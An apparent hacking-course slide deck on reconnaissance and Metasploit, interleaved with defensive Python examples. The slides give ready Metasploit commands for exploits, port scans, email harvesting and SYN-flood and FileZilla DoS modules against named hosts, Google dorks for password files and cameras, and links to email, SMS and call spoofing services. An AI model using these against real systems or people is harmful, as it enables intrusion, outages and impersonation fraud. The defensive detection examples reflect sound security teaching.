  • 14. known responses to determine the OS running on the target system. Typically while analyzing responses, the following fields & techniques can be useful- TCP Initial Window Size of packets TTL values ACK Values of packets Initial Sequence Number (ISN) values Handling of overlapped fragments, etc The attacker can be traced. That means this method is not anonymous. Nmap commands:- nmap –O –v www.altoromutual.com nmap –A –v www.altoromutual.com Passive Fingerprinting Problem with active fingerprinting is that it reveals the identity of the criminal http://lcamtuf.coredump.cx/p0f3/ P0f will try to determine the OS information by simply analyzing the data packets sent by the target system while performing usual and routine communication like if target visits your website, sends you a file, etc. p0f –L . p0f –i 4 (interface number) TTL, window size, DF Bit and TOS fields in the reply TCP packet is analyzed to get remote OS. OS Detection Countermeasures Change the default values of your OS like TTL, ISN, etc. Mislead attacker by configuring default values of some other OS on your system. Use ACLs to filter out unwanted probing packets. Security Auditing It is a technique of scanning the victim computer for any potential security loopholes that may exist on it, using which an attacker can hack into it. Tools: Nessus, GFI Languard, Retina Scan, SAINT, Core Impact, NSAuditor (Not Free) Attacking target computer using METASPLOIT In my previous blog, I have covered detailed step by step instructions on how to collect maximum information about victim in pursuit of getting any possible weak entry points. It is popularly called Vulnerabilities. Once you get any possible loopholes or vulnerabilities, it is the perfect time to ATTACK!!! Metasploit is an open source framework for penetration testing that allows you to test the security of a network. It had a built in large database of hundreds of known
  • 15. loopholes and vulnerabilities for various platforms and software. It allows you to automatically test a remote system for all these hundreds of security loopholes. EXPLOIT: is a code, software or tool that misuses a vulnerability or loophole on a remote machine to cause malicious results on it. PAYLOAD: is defined as the effect of executing the exploit code and some other payload code on a remote machine, which allows a medium of communication to be established between the attacker and the victim. It could be in the form of modification/deletion of data, getting shell access, file access and others. Each EXPLOIT will support certain type of PAYLOADS. STEPS INVOLVED 1. Identify loophole on victim using network reconnaissance, security auditing and penetration testing. 2. Select and configure that exploit and various exploit options on metasploit. 3. Select victim computer and victim port. 4. Select payload you wish to launch with exploit code. 5. Launch the attack. Metasploit Commands: >help >banner >connect www.altoromutual.com 80 Get /HTTP/1.0 >ping www.altoromutual.com >show exploits >show payloads >show auxiliary >search type:exploit platform: windows unsafe >info windows/tftp/quick_tftp_pro_mode >use windows/tftp/quick_tftp_pro_mode windows/tftp/quick_tftp_pro_mode>show options windows/tftp/quick_tftp_pro_mode>set RHOST altoromutual.com windows/tftp/quick_tftp_pro_mode>check windows/tftp/quick_tftp_pro_mode>exploit windows/tftp/quick_tftp_pro_mode>back (exit a module) Port scanning using Metasploit It is possible to port scan a remote computer using metasploit. All nmap commands are valid in metasploit. >search portscan >use auxiliary/scanner/portscan/tcp >use auxiliary/scanner/portscan/syn (SYN port scan) >use auxiliary/scanner/portscan/xmas (XMAS port scan) >use auxiliary/scanner/portscan/ack (ACK port scan) >show options >set RHOSTS www.victim.com >set RPORTS 1-100 >set verbose true >run
  • 16. >nmap -sT -p 1-100 -Pn www.victim.com

    Daemon Banner Grabbing using Metasploit
        >use auxiliary/scanner/pop3/pop3_version
        >set RHOSTS www.victim.com
        >run
    Similarly,
        >use auxiliary/scanner/http/http_version
        >set RHOSTS www.victim.com
        >run
        >use auxiliary/scanner/smtp/smtp_version
        >set RHOSTS www.victim.com
        >run
    (SMTP runs on port 25, port 80 is HTTP and port 110 is POP3)

    Grabbing Email Addresses from a website
        >search collector
        >use auxiliary/gather/search_email_collector
        >show options
        >set DOMAIN www.victim.com
        >run

    TCP flooding using Metasploit
    It is possible to execute a DoS attack against various victims using Metasploit.
        >use auxiliary/dos/tcp/synflood
        >set RHOST www.victim.com
        >run
    FileZilla is a popular FTP server for the Windows platform. There are 2 exploit modules in Metasploit that can be used to execute a DoS attack against some versions of the FileZilla server:
        >use auxiliary/dos/windows/ftp/filezilla_admin_user
        >set RHOST www.victim.com
        >run
        >use auxiliary/dos/windows/ftp/filezilla_server_port
        >set RHOST www.victim.com
        >run

    Disposable email (anonymous): www.hidemyass.com
    Email Spoofing: the art of sending a spoofed email from somebody else's email account. www.anonymizer.in/fake-mailer
    SMS Spoofing (paid service, but may be worth it): http://www.spranked.com/ http://www.phonytext.com/
    Call Spoofing: http://www.mobivox.com
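The passive fingerprinting section on slide 14 says that p0f reads the TTL, window size and DF bit of packets a host sends in ordinary traffic and matches them against a signature database. The heuristic below is an added example, not code from the slides or from p0f: it rounds an observed TTL up to a common initial value to estimate the hop count, then looks the (initial TTL, window, DF) triple up in a small constructed signature table. The table, the field names and the sample packets are assumptions made for illustration; it also shows why the slide's countermeasure of changing only the TTL leaves a host unrecognised rather than disguised.

```python
"""Passive OS fingerprinting heuristic, in the spirit of the p0f approach on
slide 14. Added example, not code from the slides or from p0f: the signature
table, the packet records and the field names are constructed assumptions."""
from dataclasses import dataclass

# Initial TTL values that operating systems commonly start with. The TTL seen on
# the wire is the initial value minus the number of routers crossed.
INITIAL_TTLS = (32, 64, 128, 255)

# Constructed (initial TTL, TCP window size, DF bit) -> OS family table. p0f's
# real database is far larger and also uses TCP options, MSS and TOS.
SIGNATURES = {
    (64, 29200, True): "Linux-like",
    (64, 65535, True): "BSD/macOS-like",
    (128, 8192, True): "Windows-like",
    (128, 65535, True): "Windows-like",
    (255, 4128, False): "Cisco IOS-like",
}


@dataclass(frozen=True)
class SynObservation:
    """Fields a passive sensor records from one SYN a remote host sent us."""
    src: str
    ttl: int
    window: int
    df: bool


def infer_initial_ttl(observed_ttl):
    """Round the observed TTL up to the nearest common initial value."""
    for candidate in INITIAL_TTLS:
        if observed_ttl <= candidate:
            return candidate
    return INITIAL_TTLS[-1]


def fingerprint(obs):
    """Return (os_guess, estimated_hops) for one observation."""
    initial = infer_initial_ttl(obs.ttl)
    hops = initial - obs.ttl
    guess = SIGNATURES.get((initial, obs.window, obs.df), "unknown")
    return guess, hops


def summarize(observations):
    """Map each source address to its OS guess and hop estimate."""
    return {o.src: fingerprint(o) for o in observations}


# Constructed observations. 10.0.0.7 is a Linux host whose admin changed only
# the default TTL to 128 (the slide's countermeasure); 10.0.0.8 mimics Windows
# fully (TTL 128 and window 8192), so the heuristic is misled.
SAMPLE = [
    SynObservation("10.0.0.5", ttl=62, window=29200, df=True),
    SynObservation("10.0.0.9", ttl=126, window=8192, df=True),
    SynObservation("10.0.0.7", ttl=122, window=29200, df=True),
    SynObservation("10.0.0.8", ttl=124, window=8192, df=True),
]

if __name__ == "__main__":
    for src, (guess, hops) in summarize(SAMPLE).items():
        print(f"{src:10} {guess:16} ~{hops} hops away")
```

The same logic is useful on the defending side: run over a sensor's SYN records it gives a rough inventory of what operating systems are talking to your servers, and a host whose guess flips between families over time is worth a look.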
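The port-scanning commands on slides 15 and 16 list SYN, XMAS and ACK scans. The detector below is an added example, not Metasploit or nmap code, showing what those scans look like from the target's firewall log: a single source touching many distinct ports on one host with the same TCP flag pattern in a short window. The log line format imitates a netfilter LOG entry but is constructed, and the thresholds (10 ports in 60 seconds) are assumptions you would tune to your own traffic.

```python
"""Port-scan detection over constructed firewall log lines: the defender's view
of the SYN, XMAS and ACK scans listed in the port-scanning section. Added
example, not Metasploit or nmap code; the log format imitates a netfilter LOG
line but is constructed, and the thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=TCP "
    r"SPT=\d+ DPT=(?P<dpt>\d+) FLAGS=(?P<flags>[A-Z]+)$"
)

# TCP flag sets (letters sorted) named after the scan types in the slides.
SCAN_TYPES = {"S": "SYN scan", "FPU": "XMAS scan", "A": "ACK scan"}


def parse_line(line):
    """Return a dict for a matching line, or None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "src": m["src"],
        "dst": m["dst"],
        "dpt": int(m["dpt"]),
        "flags": "".join(sorted(m["flags"])),  # FPU == PFU == UFP
    }


def detect_scans(lines, min_ports=10, window_seconds=60):
    """Flag a source that probes at least min_ports distinct ports on one
    host with the same flag pattern inside window_seconds."""
    events = defaultdict(list)  # (src, dst, flags) -> [(ts, dpt), ...]
    for line in lines:
        rec = parse_line(line)
        if rec and rec["flags"] in SCAN_TYPES:
            events[(rec["src"], rec["dst"], rec["flags"])].append((rec["ts"], rec["dpt"]))

    alerts = []
    for (src, dst, flags), hits in events.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # slide the window start forward until it spans <= window_seconds
            while (hits[end][0] - hits[start][0]).total_seconds() > window_seconds:
                start += 1
            ports = {dpt for _, dpt in hits[start:end + 1]}
            if len(ports) >= min_ports:
                alerts.append({
                    "src": src, "dst": dst, "type": SCAN_TYPES[flags],
                    "distinct_ports": len(ports),
                    "first": hits[start][0], "last": hits[end][0],
                })
                break  # one alert per (source, target, scan type)
    return alerts


# Constructed log: one SYN sweep, one XMAS sweep, a client that only touches
# two ports (normal browsing), and a line that does not parse.
SAMPLE_LOG = (
    [f"2024-03-01T10:00:{i:02d} SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP "
     f"SPT=40{i:03d} DPT={i + 1} FLAGS=S" for i in range(12)]
    + [f"2024-03-01T10:05:{i:02d} SRC=203.0.113.9 DST=192.0.2.10 PROTO=TCP "
       f"SPT=51{i:03d} DPT={20 + i} FLAGS=PFU" for i in range(10)]
    + ["2024-03-01T10:07:00 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=52001 DPT=443 FLAGS=S",
       "2024-03-01T10:07:03 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=52002 DPT=80 FLAGS=S",
       "kernel: unrelated line that the parser ignores"]
)

if __name__ == "__main__":
    for a in detect_scans(SAMPLE_LOG):
        print(f"{a['type']:9} from {a['src']} -> {a['dst']}: "
              f"{a['distinct_ports']} ports between {a['first']} and {a['last']}")
```

Keying on the flag pattern matters: an XMAS scan never completes a handshake, so a detector that only counts SYNs misses it, while the plain SYN count also catches nmap's default -sS scan. The slow-scan case (one port per minute) slips under a fixed window by design, which is why real deployments keep longer-lived per-source state as well.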
  • 17. Google Dorks
    Google Hacking or Google Dorking is the use of clever Google search tags or commands to try and reveal sensitive data about victims, like password files, vulnerable servers and others. A Google dork, in hacker slang, is somebody whose sensitive data is revealed through Google Hacking or Google Dorking.
    Examples:
        info:<web address>
        cache:www.facebook.com password (retrieve old cached copy of webpage)
        link:www.flyingmachine.co.in
        allintitle:Login
        allintitle:Login+site:timesofindia.com
        allinurl:password login
        allinurl:password login+site:www.google.com
        inurl:/view.index.shtml (access live cameras)
        inurl:/view.indexFrame.shtml Axis
        ext:pdf hacking site:gov
        inurl:admin login
        site:in inurl:admin login
        intitle:intranet inurl:intranet+site:in
        "Welcome to phpMyAdmin" AND "Create new database"
        "index of /etc/passwd"
    Google Hacking Database (GHDB): http://www.hackersforcharity.org/ghdb/

    Website Mirroring
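Returning to the Google Dorks section above: the dorks work only because the admin, intranet and phpMyAdmin pages were crawled and indexed in the first place, so the first thing a site owner checks is what their robots.txt actually tells crawlers. The evaluator below is an added example, not code from the slides; the robots.txt text, the paths and the crawler names are constructed. It follows the longest-match rule of RFC 9309 (with "*" wildcards and a "$" end anchor) and demonstrates a classic mistake: a dedicated Googlebot group replaces the "*" group entirely, so the admin and intranet rules never apply to Googlebot.

```python
"""robots.txt evaluation for the kinds of paths the Google dork examples
target. Added example, not code from the slides; the robots.txt text, the
paths and the agent names are constructed. Matching follows the longest-match
rule of RFC 9309, with '*' wildcards and a '$' end anchor."""
import re


def parse_robots(text):
    """Return {user-agent (lowercased): [(is_allow, path_pattern), ...]}."""
    groups = {}
    agents = []           # agents of the group currently being filled
    in_agent_run = False  # True while consecutive User-agent lines are read
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if not in_agent_run:
                agents = []
            agents.append(value.lower())
            groups.setdefault(value.lower(), [])
            in_agent_run = True
            continue
        in_agent_run = False
        if field in ("allow", "disallow") and value:
            for agent in agents:
                groups[agent].append((field == "allow", value))
    return groups


def _to_regex(pattern):
    """Translate a robots path pattern ('*' wildcard, optional '$') to a regex."""
    anchored = pattern.endswith("$")
    body = pattern[:-1] if anchored else pattern
    regex = ".*".join(re.escape(part) for part in body.split("*"))
    return re.compile("^" + regex + ("$" if anchored else ""))


def is_allowed(groups, agent, path):
    """Apply the group for `agent` (or the '*' group when none exists):
    the longest matching pattern wins, and Allow beats Disallow on a tie."""
    rules = groups.get(agent.lower())
    if rules is None:
        rules = groups.get("*", [])
    best = None  # (pattern length, is_allow)
    for is_allow, pattern in rules:
        if _to_regex(pattern).match(path):
            length = len(pattern)
            if best is None or length > best[0] or (length == best[0] and is_allow):
                best = (length, is_allow)
    return True if best is None else best[1]


def audit_exposure(robots_text, agent, paths):
    """Which of `paths` may a crawler identifying as `agent` still fetch?"""
    groups = parse_robots(robots_text)
    return {p: is_allowed(groups, agent, p) for p in paths}


# Constructed robots.txt with the classic mistake: the dedicated Googlebot
# group replaces the '*' group entirely, so the admin and intranet rules do
# not apply to Googlebot at all.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /admin/
Disallow: /intranet
Allow: /intranet/public/
Disallow: /*.pdf$

User-agent: Googlebot
Disallow: /phpmyadmin/
"""

# Constructed paths shaped like the dork results on this slide.
SENSITIVE_PATHS = ["/admin/login", "/intranet/", "/intranet/public/index.html",
                   "/phpmyadmin/", "/reports/q1.pdf"]

if __name__ == "__main__":
    for agent in ("Googlebot", "Bingbot"):
        for path, ok in audit_exposure(SAMPLE_ROBOTS, agent, SENSITIVE_PATHS).items():
            print(f"{agent:9} {'crawlable' if ok else 'blocked  '} {path}")
```

robots.txt is advisory and public, so it is a hint to well-behaved crawlers and a map for everyone else, not an access control. The fix for what the dorks find is authentication in front of admin and intranet pages, disabling directory listings (the "index of" results), and a noindex header or tag on pages that must stay reachable but should not be searchable.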
